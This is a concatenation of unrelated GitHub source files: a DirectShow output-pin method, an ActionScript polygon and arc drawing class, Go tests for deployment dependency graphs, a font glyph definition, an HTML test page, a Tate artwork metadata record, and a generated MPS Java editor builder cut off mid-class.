// CTransInPlaceFilter::CompleteConnect() can reconnect a pin and we do not want to
// reconnect a pin if CBaseOutputPin::CompleteConnect() fails.
// CBaseOutputPin::CompleteConnect() often fails when our output pin is being connected
// to the Video Mixing Renderer.
HRESULT
CTransInPlaceOutputPin::CompleteConnect(IPin *pReceivePin)
{
HRESULT hr = CBaseOutputPin::CompleteConnect(pReceivePin);
if (FAILED(hr)) {
return hr;
}
return m_pTransformFilter->CompleteConnect(PINDIR_OUTPUT,pReceivePin);
} // CompleteConnect
| {
"pile_set_name": "Github"
} |
/*
A fairly versatile primitive capable of representing circles, fans, hoops, and arcs.
Contains a great sin/cos trick learned from Iñigo Quílez's site
http://www.iquilezles.org/www/articles/sincos/sincos.htm
*/
package starling.display.graphics
{
import flash.geom.Matrix;
import flash.geom.Point;
import starling.core.Starling;
import starling.display.graphics.util.TriangleUtil;
public class NGon extends Graphic
{
private const DEGREES_TO_RADIANS :Number = Math.PI / 180;
private var _radius :Number;
private var _innerRadius :Number;
private var _startAngle :Number;
private var _endAngle :Number;
private var _numSides :int;
private var _color :uint = 0xFFFFFF;
private static var _uv :Point;
public function NGon( radius:Number = 100, numSides:int = 10, innerRadius:Number = 0, startAngle:Number = 0, endAngle:Number = 360 )
{
this.radius = radius;
this.numSides = numSides;
this.innerRadius = innerRadius;
this.startAngle = startAngle;
this.endAngle = endAngle;
minBounds.x = minBounds.y = -radius;
maxBounds.x = maxBounds.y = radius;
if ( !_uv )
{
_uv = new Point();
}
}
public function get endAngle():Number
{
return _endAngle;
}
public function set endAngle(value:Number):void
{
_endAngle = value;
setGeometryInvalid();
}
public function get startAngle():Number
{
return _startAngle;
}
public function set startAngle(value:Number):void
{
_startAngle = value;
setGeometryInvalid();
}
public function get radius():Number
{
return _radius;
}
public function set color(value:uint) : void
{
_color = value;
setGeometryInvalid();
}
public function set radius(value:Number):void
{
value = value < 0 ? 0 : value;
_radius = value;
var maxRadius:Number = Math.max(_radius, _innerRadius);
minBounds.x = minBounds.y = -maxRadius;
maxBounds.x = maxBounds.y = maxRadius;
setGeometryInvalid();
}
public function get innerRadius():Number
{
return _innerRadius;
}
public function set innerRadius(value:Number):void
{
value = value < 0 ? 0 : value;
_innerRadius = value;
var maxRadius:Number = Math.max(_radius, _innerRadius);
minBounds.x = minBounds.y = -maxRadius;
maxBounds.x = maxBounds.y = maxRadius;
setGeometryInvalid();
}
public function get numSides():int
{
return _numSides;
}
public function set numSides(value:int):void
{
value = value < 3 ? 3 : value;
_numSides = value;
setGeometryInvalid();
}
override protected function buildGeometry():void
{
vertices = new Vector.<Number>();
indices = new Vector.<uint>();
// Manipulate the input startAngle and endAngle values
// into sa and ea. sa will always end up less than
// ea, and ea-sa is the shortest clockwise distance
// between them.
var sa:Number = _startAngle;
var ea:Number = _endAngle;
var isEqual:Boolean = sa == ea;
var sSign:int = sa < 0 ? -1 : 1;
var eSign:int = ea < 0 ? -1 : 1;
sa *= sSign;
ea *= eSign;
ea = ea % 360;
ea *= eSign;
sa = sa % 360;
if ( ea < sa )
{
ea += 360;
}
sa *= sSign * DEGREES_TO_RADIANS;
ea *= DEGREES_TO_RADIANS;
if ( ea - sa > Math.PI*2 )
{
ea -= Math.PI*2;
}
// Manipulate the inner and outer radii into the locals innerRadius and radius.
// innerRadius will always be less than or equal to radius.
var innerRadius:Number = _innerRadius < _radius ? _innerRadius : _radius;
var radius:Number = _radius > _innerRadius ? _radius : _innerRadius;
// Based upon the input values, choose from
// 4 primitive types. Each more complex than the next.
var isSegment:Boolean = (sa != 0 || ea != 0);
if ( isSegment == false )
isSegment = isEqual; // if sa and ea are equal, treat that as a segment, not a full lap around a circle.
if ( innerRadius == 0 && !isSegment )
{
buildSimpleNGon(radius, _numSides, vertices, indices, _uvMatrix , _color);
}
else if ( innerRadius != 0 && !isSegment )
{
buildHoop(innerRadius, radius, _numSides, vertices, indices, _uvMatrix , _color);
}
else if ( innerRadius == 0 )
{
buildFan(radius, sa, ea, _numSides, vertices, indices, _uvMatrix , _color);
}
else
{
buildArc( innerRadius, radius, sa, ea, _numSides, vertices, indices, _uvMatrix , _color);
}
}
override protected function shapeHitTestLocalInternal( localX:Number, localY:Number ):Boolean
{
var numIndices:int = indices.length;
if ( numIndices < 2 )
{
validateNow();
numIndices = indices.length;
if ( numIndices < 2 )
return false;
}
if ( _innerRadius == 0 && _radius > 0 && _startAngle == 0 && _endAngle == 360 && _numSides > 20 )
{ // simple - faster - if ngon is circle shape and numsides more than 20, assume circle is desired.
if ( Math.sqrt( localX * localX + localY * localY ) < _radius )
return true;
return false;
}
for ( var i:int = 2; i < numIndices; i+=3 )
{ // slower version - should be complete though. For all triangles, check if point is in triangle
var i0:int = indices[(i - 2)];
var i1:int = indices[(i - 1)];
var i2:int = indices[(i - 0)];
var v0x:Number = vertices[VERTEX_STRIDE * i0 + 0];
var v0y:Number = vertices[VERTEX_STRIDE * i0 + 1];
var v1x:Number = vertices[VERTEX_STRIDE * i1 + 0];
var v1y:Number = vertices[VERTEX_STRIDE * i1 + 1];
var v2x:Number = vertices[VERTEX_STRIDE * i2 + 0];
var v2y:Number = vertices[VERTEX_STRIDE * i2 + 1];
if ( TriangleUtil.isPointInTriangle(v0x, v0y, v1x, v1y, v2x, v2y, localX, localY) )
return true;
}
return false;
}
private static function buildSimpleNGon( radius:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix, color:uint ):void
{
var numVertices:int = 0;
_uv.x = 0;
_uv.y = 0;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
vertices.push( 0, 0, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
var anglePerSide:Number = (Math.PI * 2) / numSides;
var cosA:Number = Math.cos(anglePerSide);
var sinB:Number = Math.sin(anglePerSide);
var s:Number = 0.0;
var c:Number = 1.0;
for ( var i:int = 0; i < numSides; i++ )
{
var x:Number = s * radius;
var y:Number = -c * radius;
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
indices.push( 0, numVertices-1, i == numSides-1 ? 1 : numVertices );
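// Advance (s, c) = (sin, cos) of the current angle by anglePerSide using the
// angle-addition identities - the incremental sin/cos trick referenced in the
// header comment - so Math.sin/Math.cos are not called once per vertex.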
const ns:Number = sinB*c + cosA*s;
const nc:Number = cosA*c - sinB*s;
c = nc;
s = ns;
}
}
private static function buildHoop( innerRadius:Number, radius:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix , color:uint):void
{
var numVertices:int = 0;
var anglePerSide:Number = (Math.PI * 2) / numSides;
var cosA:Number = Math.cos(anglePerSide);
var sinB:Number = Math.sin(anglePerSide);
var s:Number = 0.0;
var c:Number = 1.0;
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
for ( var i:int = 0; i < numSides; i++ )
{
var x:Number = s * radius;
var y:Number = -c * radius;
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
x = s * innerRadius;
y = -c * innerRadius;
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
if ( i == numSides-1 )
{
indices.push( numVertices-2, numVertices-1, 0, 0, numVertices-1, 1 );
}
else
{
indices.push( numVertices - 2, numVertices , numVertices-1, numVertices, numVertices + 1, numVertices - 1 );
}
const ns:Number = sinB*c + cosA*s;
const nc:Number = cosA*c - sinB*s;
c = nc;
s = ns;
}
}
private static function buildFan( radius:Number, startAngle:Number, endAngle:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix , color:uint):void
{
var numVertices:int = 0;
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
vertices.push( 0, 0, 0, r, g, b, 1, 0.5, 0.5 );
numVertices++;
var radiansPerDivision:Number = (Math.PI * 2) / numSides;
var startRadians:Number = (startAngle / radiansPerDivision);
startRadians = startRadians < 0 ? -Math.ceil(-startRadians) : int(startRadians);
startRadians *= radiansPerDivision;
for ( var i:int = 0; i <= numSides+1; i++ )
{
var radians:Number = startRadians + i*radiansPerDivision;
var nextRadians:Number = radians + radiansPerDivision;
if ( nextRadians < startAngle ) continue;
var x:Number = Math.sin( radians ) * radius;
var y:Number = -Math.cos( radians ) * radius;
var prevRadians:Number = radians-radiansPerDivision;
var t:Number;
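// The fan is built on a fixed grid of angular divisions, so the first and last
// divisions can overshoot startAngle/endAngle; the two branches below pull the
// offending vertex back onto the exact boundary by interpolating between
// neighbouring divisions.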
if ( radians < startAngle && nextRadians > startAngle )
{
var nextX:Number = Math.sin(nextRadians) * radius;
var nextY:Number = -Math.cos(nextRadians) * radius;
t = (startAngle-radians) / radiansPerDivision;
x += t * (nextX-x);
y += t * (nextY-y);
}
else if ( radians > endAngle && prevRadians < endAngle )
{
var prevX:Number = Math.sin(prevRadians) * radius;
var prevY:Number = -Math.cos(prevRadians) * radius;
t = (endAngle-prevRadians) / radiansPerDivision;
x = prevX + t * (x-prevX);
y = prevY + t * (y-prevY);
}
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
if ( vertices.length > 2*9 )
{
indices.push( 0, numVertices-2, numVertices-1 );
}
if ( radians >= endAngle )
{
break;
}
}
}
private static function buildArc( innerRadius:Number, radius:Number, startAngle:Number, endAngle:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix , color:uint):void
{
var nv:int = 0;
var radiansPerDivision:Number = (Math.PI * 2) / numSides;
var startRadians:Number = (startAngle / radiansPerDivision);
startRadians = startRadians < 0 ? -Math.ceil(-startRadians) : int(startRadians);
startRadians *= radiansPerDivision;
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
for ( var i:int = 0; i <= numSides+1; i++ )
{
var angle:Number = startRadians + i*radiansPerDivision;
var nextAngle:Number = angle + radiansPerDivision;
if ( nextAngle < startAngle ) continue;
var sin:Number = Math.sin(angle);
var cos:Number = Math.cos(angle);
var x:Number = sin * radius;
var y:Number = -cos * radius;
var x2:Number = sin * innerRadius;
var y2:Number = -cos * innerRadius;
var prevAngle:Number = angle-radiansPerDivision;
var t:Number;
if ( angle < startAngle && nextAngle > startAngle )
{
sin = Math.sin(nextAngle);
cos = Math.cos(nextAngle);
var nextX:Number = sin * radius;
var nextY:Number = -cos * radius;
var nextX2:Number = sin * innerRadius;
var nextY2:Number = -cos * innerRadius;
t = (startAngle-angle) / radiansPerDivision;
x += t * (nextX-x);
y += t * (nextY-y);
x2 += t * (nextX2-x2);
y2 += t * (nextY2-y2);
}
else if ( angle > endAngle && prevAngle < endAngle )
{
sin = Math.sin(prevAngle);
cos = Math.cos(prevAngle);
var prevX:Number = sin * radius;
var prevY:Number = -cos * radius;
var prevX2:Number = sin * innerRadius;
var prevY2:Number = -cos * innerRadius;
t = (endAngle-prevAngle) / radiansPerDivision;
x = prevX + t * (x-prevX);
y = prevY + t * (y-prevY);
x2 = prevX2 + t * (x2-prevX2);
y2 = prevY2 + t * (y2-prevY2);
}
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
nv++;
_uv.x = x2;
_uv.y = y2;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x2, y2, 0, r, g, b, 1, _uv.x, _uv.y );
nv++;
if ( vertices.length > 3*9 )
{
//indices.push( nv-1, nv-2, nv-3, nv-3, nv-2, nv-4 );
indices.push( nv-3, nv-2, nv-1, nv-3, nv-4, nv-2 );
}
if ( angle >= endAngle )
{
break;
}
}
}
}
} | {
"pile_set_name": "Github"
} |
/*
Copyright 2017, 2018 Ankyra
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package state
import (
. "gopkg.in/check.v1"
)
func (s *suite) Test_GetDeploymentStateDAG_empty_env(c *C) {
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
dag, err := env.GetDeploymentStateDAG(BuildStage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 0)
}
func (s *suite) Test_GetDeploymentStateDAG_one_deployment(c *C) {
stage := DeployStage
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
depl1, err := env.GetOrCreateDeploymentState("depl1")
c.Assert(err, IsNil)
depl1.GetStageOrCreateNew(stage)
dag, err := env.GetDeploymentStateDAG(stage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 1)
c.Assert(dag[0].Node, DeepEquals, depl1)
c.Assert(dag[0].AndThen, HasLen, 0)
}
func (s *suite) Test_GetDeploymentStateDAG_two_deployments_one_provider(c *C) {
stage := DeployStage
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
depl1, err := env.GetOrCreateDeploymentState("depl1")
c.Assert(err, IsNil)
depl2, err := env.GetOrCreateDeploymentState("depl2")
c.Assert(err, IsNil)
st := depl1.GetStageOrCreateNew(stage)
st.Providers["whatever"] = "depl2"
depl2.GetStageOrCreateNew(stage)
dag, err := env.GetDeploymentStateDAG(stage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 1)
c.Assert(dag[0].Node, DeepEquals, depl2)
c.Assert(dag[0].AndThen, HasLen, 1)
c.Assert(dag[0].AndThen[0].Node, DeepEquals, depl1)
c.Assert(dag[0].AndThen[0].AndThen, HasLen, 0)
tsort, err := env.GetDeploymentStateTopologicalSort(stage)
c.Assert(err, IsNil)
c.Assert(tsort, HasLen, 2)
c.Assert(tsort[0], DeepEquals, depl2)
c.Assert(tsort[1], DeepEquals, depl1)
}
func (s *suite) Test_GetDeploymentStateDAG(c *C) {
// For deployment graph:
//
// A -> B, E
// B -> C, D
// C -> D
// D
// E
stage := DeployStage
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
deplA, err := env.GetOrCreateDeploymentState("deplA")
c.Assert(err, IsNil)
deplB, err := env.GetOrCreateDeploymentState("deplB")
c.Assert(err, IsNil)
deplC, err := env.GetOrCreateDeploymentState("deplC")
c.Assert(err, IsNil)
deplD, err := env.GetOrCreateDeploymentState("deplD")
c.Assert(err, IsNil)
deplE, err := env.GetOrCreateDeploymentState("deplE")
c.Assert(err, IsNil)
stA := deplA.GetStageOrCreateNew(stage)
stA.Providers["b"] = "deplB"
stA.Providers["e"] = "deplE"
stB := deplB.GetStageOrCreateNew(stage)
stB.Providers["c"] = "deplC"
stB.Providers["d"] = "deplD"
stC := deplC.GetStageOrCreateNew(stage)
stC.Providers["d"] = "deplD"
deplD.GetStageOrCreateNew(stage)
deplE.GetStageOrCreateNew(stage)
dag, err := env.GetDeploymentStateDAG(stage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 2)
var bDag, cDag, dDag, eDag *DAGNode
if dag[0].Node.Name == "deplD" {
dDag = dag[0]
eDag = dag[1]
} else {
dDag = dag[1]
eDag = dag[0]
}
c.Assert(dDag.Node, DeepEquals, deplD)
c.Assert(dDag.AndThen, HasLen, 2)
if dDag.AndThen[0].Node.Name == "deplB" {
bDag = dDag.AndThen[0]
cDag = dDag.AndThen[1]
} else {
bDag = dDag.AndThen[1]
cDag = dDag.AndThen[0]
}
c.Assert(bDag.Node, DeepEquals, deplB)
c.Assert(bDag.AndThen, HasLen, 1)
c.Assert(bDag.AndThen[0].Node, DeepEquals, deplA)
c.Assert(cDag.Node, DeepEquals, deplC)
c.Assert(cDag.AndThen, HasLen, 1)
c.Assert(cDag.AndThen[0].Node, DeepEquals, deplB)
c.Assert(eDag.Node, DeepEquals, deplE)
c.Assert(eDag.AndThen, HasLen, 1)
c.Assert(eDag.AndThen[0].Node, DeepEquals, deplA)
i := 0
for i < 1000 {
tsort, err := env.GetDeploymentStateTopologicalSort(stage)
c.Assert(err, IsNil)
for ix, depl := range tsort {
st := depl.GetStageOrCreateNew(stage)
for _, deplName := range st.Providers {
found := false
for depIx, depDepl := range tsort {
if depDepl.Name == deplName {
found = true
c.Assert(depIx < ix, Equals, true, Commentf("Deployment '%s' should happen before '%s'", deplName, depl.Name))
}
}
c.Assert(found, Equals, true, Commentf("Missing provider deployment '%s' in topological sort", deplName))
}
}
i += 1
}
}
type hasItemChecker struct{}
var HasItem = &hasItemChecker{}
func (*hasItemChecker) Info() *CheckerInfo {
return &CheckerInfo{Name: "HasItem", Params: []string{"obtained", "expected to have item"}}
}
func (*hasItemChecker) Check(params []interface{}, names []string) (bool, string) {
obtained := params[0]
expectedItem := params[1]
switch obtained.(type) {
case []interface{}:
for _, v := range obtained.([]interface{}) {
if v == expectedItem {
return true, ""
}
}
case []string:
for _, v := range obtained.([]string) {
if v == expectedItem {
return true, ""
}
}
default:
return false, "Unexpected type."
}
return false, "Item not found"
}
| {
"pile_set_name": "Github"
} |
StartChar: delta.sc
Encoding: 1114211 -1 892
Width: 434
Flags: MW
LayerCount: 2
Fore
SplineSet
116 2 m 2
96 2 63 -3 40 -3 c 0
26 -3 17 9 17 17 c 0
17 26 32 49 50 92 c 2
166 360 l 2
180 393 175 407 178 410 c 0
187 419 211 444 217 451 c 0
225 460 230 463 233 463 c 0
237 463 238 460 240 454 c 2
375 107 l 2
386 79 410 30 410 17 c 0
410 10 395 -3 381 -3 c 0
359 -3 325 2 290 2 c 2
116 2 l 2
311 58 m 2
207 337 l 2
201 352 199 352 193 337 c 2
83 65 l 2
76 48 86 48 86 48 c 1
294 48 l 1
294 48 315 47 311 58 c 2
EndSplineSet
Validated: 1
EndChar
| {
"pile_set_name": "Github"
} |
<html>
<head>
<title>Test</title>
<script src="example_output.js"></script>
<script>
init = function() {
var person = Person.createFrom({
"name": "Ovo Ono",
"nicknames": ["aaa", "bbb"],
"personal_info": {
"hobby": ["1", "2"],
"pet_name": "nera"
},
"addresses": [
{ "city": "aaa", "number": 13 },
{ "city": "bbb", "number": 14 }
]});
if (person.getInfo() != "name:Ovo Ono") {
alert("Person method not there");
return;
}
if (person.personal_info.hobby.length != 2) {
alert("No hobbies found");
return;
}
if (person.addresses.length != 2) {
alert("No addresses found");
return;
}
if (person.addresses[1].getAddressString() != "bbb 14") {
alert("Address methodincorrect");
return;
}
alert("OK");
Person.createFrom({
"name": "Ovo Ono",
"nicknames": ["aaa", "bbb"],
"personal_info": {
"hobby": ["1", "2"],
"pet_name": "nera"
}});
alert("OK");
var person = Person.createFrom({
"name": "Ovo Ono",
"nicknames": ["aaa", "bbb"],
"personal_info": {}
});
alert("OK");
var person = Person.createFrom({
});
alert("OK");
};
</script>
</head>
<body onload="init()">
<h1>Test</h1>
<h2>OK (check browser console for errors)?</h2>
</body>
</html>
| {
"pile_set_name": "Github"
} |
{
"acno": "D03930",
"acquisitionYear": 1856,
"all_artists": "Joseph Mallord William Turner",
"catalogueGroup": {
"accessionRanges": "D03833-D03973; D40780",
"completeStatus": "COMPLETE",
"finbergNumber": "LXVI",
"groupType": "Turner Sketchbook",
"id": 65716,
"shortTitle": "Egyptian Details Sketchbook"
},
"classification": "on paper, unique",
"contributorCount": 1,
"contributors": [
{
"birthYear": 1775,
"date": "1775\u20131851",
"displayOrder": 1,
"fc": "Joseph Mallord William Turner",
"gender": "Male",
"id": 558,
"mda": "Turner, Joseph Mallord William",
"role": "artist",
"startLetter": "T"
}
],
"creditLine": "Accepted by the nation as part of the Turner Bequest 1856",
"dateRange": {
"endYear": 1800,
"startYear": 1799,
"text": "c.1799-1800"
},
"dateText": "c.1799\u20131800",
"depth": "",
"dimensions": "support: 166 x 82 mm",
"finberg": "LXVI 94",
"foreignTitle": null,
"groupTitle": "Egyptian Details Sketchbook",
"height": "82",
"id": 31325,
"inscription": null,
"medium": null,
"movementCount": 0,
"pageNumber": 191,
"subjectCount": 0,
"thumbnailCopyright": null,
"thumbnailUrl": null,
"title": "[blank]",
"units": "mm",
"url": "http://www.tate.org.uk/art/artworks/turner-blank-d03930",
"width": "166"
} | {
"pile_set_name": "Github"
} |
package jetbrains.mps.lang.plugin.standalone.editor;
/*Generated by MPS */
import jetbrains.mps.editor.runtime.descriptor.AbstractEditorBuilder;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.mps.openapi.model.SNode;
import jetbrains.mps.openapi.editor.EditorContext;
import jetbrains.mps.openapi.editor.cells.EditorCell;
import jetbrains.mps.nodeEditor.cells.EditorCell_Collection;
import jetbrains.mps.nodeEditor.cellLayout.CellLayout_Vertical;
import jetbrains.mps.openapi.editor.style.Style;
import jetbrains.mps.editor.runtime.style.StyleImpl;
import jetbrains.mps.editor.runtime.style.StyleAttributes;
import jetbrains.mps.nodeEditor.BlockCells;
import jetbrains.mps.nodeEditor.cellLayout.CellLayout_Horizontal;
import jetbrains.mps.nodeEditor.cells.EditorCell_Constant;
import org.jetbrains.mps.openapi.language.SProperty;
import jetbrains.mps.openapi.editor.menus.transformation.SPropertyInfo;
import jetbrains.mps.nodeEditor.cells.EditorCell_Property;
import jetbrains.mps.nodeEditor.cells.SPropertyAccessor;
import jetbrains.mps.nodeEditor.cellMenu.SPropertySubstituteInfo;
import jetbrains.mps.lang.smodel.generator.smodelAdapter.SNodeOperations;
import jetbrains.mps.lang.smodel.generator.smodelAdapter.IAttributeDescriptor;
import jetbrains.mps.internal.collections.runtime.Sequence;
import jetbrains.mps.internal.collections.runtime.IWhereFilter;
import java.util.Objects;
import jetbrains.mps.lang.core.behavior.PropertyAttribute__BehaviorDescriptor;
import jetbrains.mps.nodeEditor.EditorManager;
import jetbrains.mps.openapi.editor.update.AttributeKind;
import jetbrains.mps.nodeEditor.MPSFonts;
import jetbrains.mps.nodeEditor.cells.EditorCell_Indent;
import jetbrains.mps.nodeEditor.cellProviders.AbstractCellListHandler;
import jetbrains.mps.lang.editor.cellProviders.RefNodeListHandler;
import org.jetbrains.mps.openapi.language.SContainmentLink;
import org.jetbrains.mps.openapi.language.SAbstractConcept;
import jetbrains.mps.openapi.editor.menus.transformation.SNodeLocation;
import jetbrains.mps.openapi.editor.cells.DefaultSubstituteInfo;
import jetbrains.mps.nodeEditor.cellMenu.SEmptyContainmentSubstituteInfo;
import jetbrains.mps.nodeEditor.cellMenu.SChildSubstituteInfo;
import jetbrains.mps.openapi.editor.cells.CellActionType;
import jetbrains.mps.nodeEditor.cellActions.CellAction_DeleteNode;
import jetbrains.mps.lang.editor.cellProviders.SingleRoleCellProvider;
import jetbrains.mps.editor.runtime.impl.cellActions.CellAction_DeleteSmart;
import jetbrains.mps.smodel.adapter.structure.MetaAdapterFactory;
import org.jetbrains.mps.openapi.language.SConcept;
/*package*/ class ApplicationPluginDeclaration_EditorBuilder_a extends AbstractEditorBuilder {
@NotNull
private SNode myNode;
public ApplicationPluginDeclaration_EditorBuilder_a(@NotNull EditorContext context, @NotNull SNode node) {
super(context);
myNode = node;
}
@NotNull
@Override
public SNode getNode() {
return myNode;
}
/*package*/ EditorCell createCell() {
return createCollection_0();
}
private EditorCell createCollection_0() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Vertical());
editorCell.setCellId("Collection_n7kiqy_a");
editorCell.setBig(true);
setCellContext(editorCell);
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createCollection_1());
editorCell.addEditorCell(createCollection_3());
if (nodeCondition_n7kiqy_a2a()) {
editorCell.addEditorCell(createConstant_4());
}
return editorCell;
}
private boolean nodeCondition_n7kiqy_a2a() {
return BlockCells.useBraces();
}
private EditorCell createCollection_1() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Horizontal());
editorCell.setCellId("Collection_n7kiqy_a0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createCollection_2());
if (nodeCondition_n7kiqy_a1a0()) {
editorCell.addEditorCell(createConstant_1());
}
return editorCell;
}
private boolean nodeCondition_n7kiqy_a1a0() {
return BlockCells.useBraces();
}
private EditorCell createCollection_2() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Horizontal());
editorCell.setCellId("Collection_n7kiqy_a0a");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createConstant_0());
editorCell.addEditorCell(createProperty_0());
return editorCell;
}
private EditorCell createConstant_0() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "application plugin");
editorCell.setCellId("Constant_n7kiqy_a0a0");
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createProperty_0() {
getCellFactory().pushCellContext();
try {
final SProperty property = PROPS.name$MnvL;
getCellFactory().setPropertyInfo(new SPropertyInfo(myNode, property));
EditorCell_Property editorCell = EditorCell_Property.create(getEditorContext(), new SPropertyAccessor(myNode, property, false, false), myNode);
editorCell.setDefaultText("<name>");
editorCell.setCellId("property_name");
editorCell.setSubstituteInfo(new SPropertySubstituteInfo(editorCell, property));
setCellContext(editorCell);
Iterable<SNode> propertyAttributes = SNodeOperations.ofConcept(new IAttributeDescriptor.AllAttributes().list(myNode), CONCEPTS.PropertyAttribute$Gb);
Iterable<SNode> currentPropertyAttributes = Sequence.fromIterable(propertyAttributes).where(new IWhereFilter<SNode>() {
public boolean accept(SNode it) {
return Objects.equals(PropertyAttribute__BehaviorDescriptor.getProperty_id1avfQ4BBzOo.invoke(it), property);
}
});
if (Sequence.fromIterable(currentPropertyAttributes).isNotEmpty()) {
EditorManager manager = EditorManager.getInstanceFromContext(getEditorContext());
return manager.createNodeRoleAttributeCell(Sequence.fromIterable(currentPropertyAttributes).first(), AttributeKind.PROPERTY, editorCell);
} else
return editorCell;
} finally {
getCellFactory().popCellContext();
}
}
private EditorCell createConstant_1() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "{");
editorCell.setCellId("Constant_n7kiqy_b0a");
Style style = new StyleImpl();
style.set(StyleAttributes.MATCHING_LABEL, "brace");
style.set(StyleAttributes.INDENT_LAYOUT_NO_WRAP, true);
style.set(StyleAttributes.FONT_STYLE, MPSFonts.PLAIN);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createCollection_3() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Horizontal());
editorCell.setCellId("Collection_n7kiqy_b0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createIndentCell_0());
editorCell.addEditorCell(createCollection_4());
return editorCell;
}
private EditorCell createIndentCell_0() {
EditorCell_Indent editorCell = new EditorCell_Indent(getEditorContext(), myNode);
return editorCell;
}
private EditorCell createCollection_4() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Vertical());
editorCell.setCellId("Collection_n7kiqy_b1a");
editorCell.addEditorCell(createRefNodeList_0());
editorCell.addEditorCell(createConstant_2());
editorCell.addEditorCell(createRefNode_0());
editorCell.addEditorCell(createConstant_3());
editorCell.addEditorCell(createRefNode_1());
return editorCell;
}
private EditorCell createRefNodeList_0() {
AbstractCellListHandler handler = new fieldDeclarationListHandler_n7kiqy_a1b0(myNode, getEditorContext());
EditorCell_Collection editorCell = handler.createCells(new CellLayout_Vertical(), false);
editorCell.setCellId("refNodeList_fieldDeclaration");
editorCell.setSRole(handler.getElementSRole());
return editorCell;
}
private static class fieldDeclarationListHandler_n7kiqy_a1b0 extends RefNodeListHandler {
@NotNull
private SNode myNode;
public fieldDeclarationListHandler_n7kiqy_a1b0(SNode ownerNode, EditorContext context) {
super(context, false);
myNode = ownerNode;
}
@NotNull
public SNode getNode() {
return myNode;
}
public SContainmentLink getSLink() {
return LINKS.fieldDeclaration$HYka;
}
public SAbstractConcept getChildSConcept() {
return CONCEPTS.DefaultClassifierFieldDeclaration$Hv;
}
public EditorCell createNodeCell(SNode elementNode) {
EditorCell elementCell = getUpdateSession().updateChildNodeCell(elementNode);
installElementCellActions(elementNode, elementCell, false);
return elementCell;
}
public EditorCell createEmptyCell() {
getCellFactory().pushCellContext();
getCellFactory().setNodeLocation(new SNodeLocation.FromParentAndLink(fieldDeclarationListHandler_n7kiqy_a1b0.this.getNode(), LINKS.fieldDeclaration$HYka));
try {
EditorCell emptyCell = null;
emptyCell = super.createEmptyCell();
installElementCellActions(null, emptyCell, true);
setCellContext(emptyCell);
return emptyCell;
} finally {
getCellFactory().popCellContext();
}
}
